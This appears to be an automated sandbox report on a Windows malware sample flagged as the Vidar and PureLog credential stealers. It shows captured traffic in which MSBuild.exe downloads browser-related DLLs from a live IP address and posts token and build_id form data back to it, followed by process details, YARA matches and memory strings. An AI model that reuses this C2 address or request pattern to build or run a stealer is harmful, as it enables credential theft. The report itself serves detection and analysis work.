                                                                                                                                                                                                                                                                          Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                                                                                                                                                                                                          2024-04-20 12:28:23 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                                                                                                                                                                                                          Data Ascii: 0<48%8A)$(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49749 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:24 UTC | 156 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Cache-Control: no-cache
2024-04-20 12:28:25 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:24 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-94750"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49750 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:26 UTC | 157 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Cache-Control: no-cache
2024-04-20 12:28:27 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:26 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-6dde8"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49751 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:28 UTC | 153 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Cache-Control: no-cache
2024-04-20 12:28:29 UTC | 248 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:29 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-1f3950"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49752 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:31 UTC | 157 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Cache-Control: no-cache
2024-04-20 12:28:32 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:31 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-3ef50"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49753 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:33 UTC | 161 | OUT | GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Cache-Control: no-cache
2024-04-20 12:28:34 UTC | 245 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:33 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-13bf0"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49754 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:35 UTC | 262 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 1145
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-20 12:28:35 UTC | 1145 | OUT
Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------CFCBFBGDBKJKECAAKKFHCont
2024-04-20 12:28:36 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-20 12:28:36 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49755 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:36 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFB
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-20 12:28:36 UTC | 331 | OUT
Data Ascii: ------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------KECFIDGCBFBAKEBFBKFBCont
2024-04-20 12:28:37 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-20 12:28:37 UTC | 2228 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49756 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:37 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJE
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-20 12:28:37 UTC | 331 | OUT
Data Ascii: ------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------CGCFBFBGHDGDAKECAKJECont
2024-04-20 12:28:38 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-20 12:28:38 UTC | 131 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49757 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:39 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIEHJEHDBGHIDGDGHCBG
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-20 12:28:39 UTC | 453 | OUT
Data Ascii: ------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------IIEHJEHDBGHIDGDGHCBGCont
2024-04-20 12:28:40 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-20 12:28:40 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49758 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:41 UTC | 264 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 139465
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:41 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------CFCBFBGDBKJKECAAKKFHCont
2024-04-20 12:28:43 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-20 12:28:43 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49759 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:43 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBAFCAKEHDHDHIDHDGDH
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-20 12:28:43 UTC | 331 | OUT | Data Ascii:
------CBAFCAKEHDHDHIDHDGDH
Content-Disposition: form-data; name="token"

7297022d6b5036db57a52911a47bf8d9
------CBAFCAKEHDHDHIDHDGDH
Content-Disposition: form-data; name="build_id"

b5f40911557c4cc23474d57610568eeb
------CBAFCAKEHDHDHIDHDGDH
Cont
2024-04-20 12:28:44 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-20 12:28:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49760 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:44 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJE
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-20 12:28:44 UTC | 331 | OUT | Data Ascii:
------JDHCBAEHJJJKKFIDGHJE
Content-Disposition: form-data; name="token"

7297022d6b5036db57a52911a47bf8d9
------JDHCBAEHJJJKKFIDGHJE
Content-Disposition: form-data; name="build_id"

b5f40911557c4cc23474d57610568eeb
------JDHCBAEHJJJKKFIDGHJE
Cont
2024-04-20 12:28:45 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-20 12:28:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                          Start time:14:27:55
                                                                                                                                                                                                                                                                          Start date:20/04/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe"
                                                                                                                                                                                                                                                                          Imagebase:0xb00000
                                                                                                                                                                                                                                                                          File size:2'952'808 bytes
                                                                                                                                                                                                                                                                          MD5 hash:7F1E688E77760AD29C560404A2FB9D2F
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1760730113.0000000005D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1758894906.0000000005960000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1752049015.00000000043CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1752049015.0000000004853000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1752049015.0000000004853000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                                          Start time:14:28:06
                                                                                                                                                                                                                                                                          Start date:20/04/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x9b0000
                                                                                                                                                                                                                                                                          File size:262'432 bytes
                                                                                                                                                                                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: ,oq$4$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                                                                                                                                                            • API String ID: 0-1127353760
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: ,oq$4$$kq$$kq$$kq$$kq
                                                                                                                                                                                                                                                                            • API String ID: 0-569362799
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758075813.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5710000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 2$$kq
                                                                                                                                                                                                                                                                            • API String ID: 0-2649369545
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758672744.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Tekq
                                                                                                                                                                                                                                                                            • API String ID: 0-2319236580
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758672744.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Tekq
                                                                                                                                                                                                                                                                            • API String ID: 0-2319236580
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Hoq$Hoq$Hoq
                                                                                                                                                                                                                                                                            • API String ID: 0-3310881576
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 4'kq$4'kq$4'kq
                                                                                                                                                                                                                                                                            • API String ID: 0-2478202913
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (oq$(oq$Hoq
                                                                                                                                                                                                                                                                            • API String ID: 0-3836682603
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 8pq$Tekq
                                                                                                                                                                                                                                                                            • API String ID: 0-3749742652
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Hoq$Hoq
                                                                                                                                                                                                                                                                            • API String ID: 0-3106737575
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: d%qq$d%qq
                                                                                                                                                                                                                                                                            • API String ID: 0-1943325001
                                                                                                                                                                                                                                                                            • Opcode ID: 5eb90eaf2d032813793b57a6c200295ba86ef99d3367e4d718e44e771a3b8613
                                                                                                                                                                                                                                                                            • Instruction ID: c188e039d099e657f30ce1cb2a5bd04792a1392b1fb72f952575dd2e67678933
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eb90eaf2d032813793b57a6c200295ba86ef99d3367e4d718e44e771a3b8613
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6619030B0431DDFDB04DA69C950BAE77A6FF88704F208469E006EF3A4EA79DD458B95
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: d%qq$d%qq
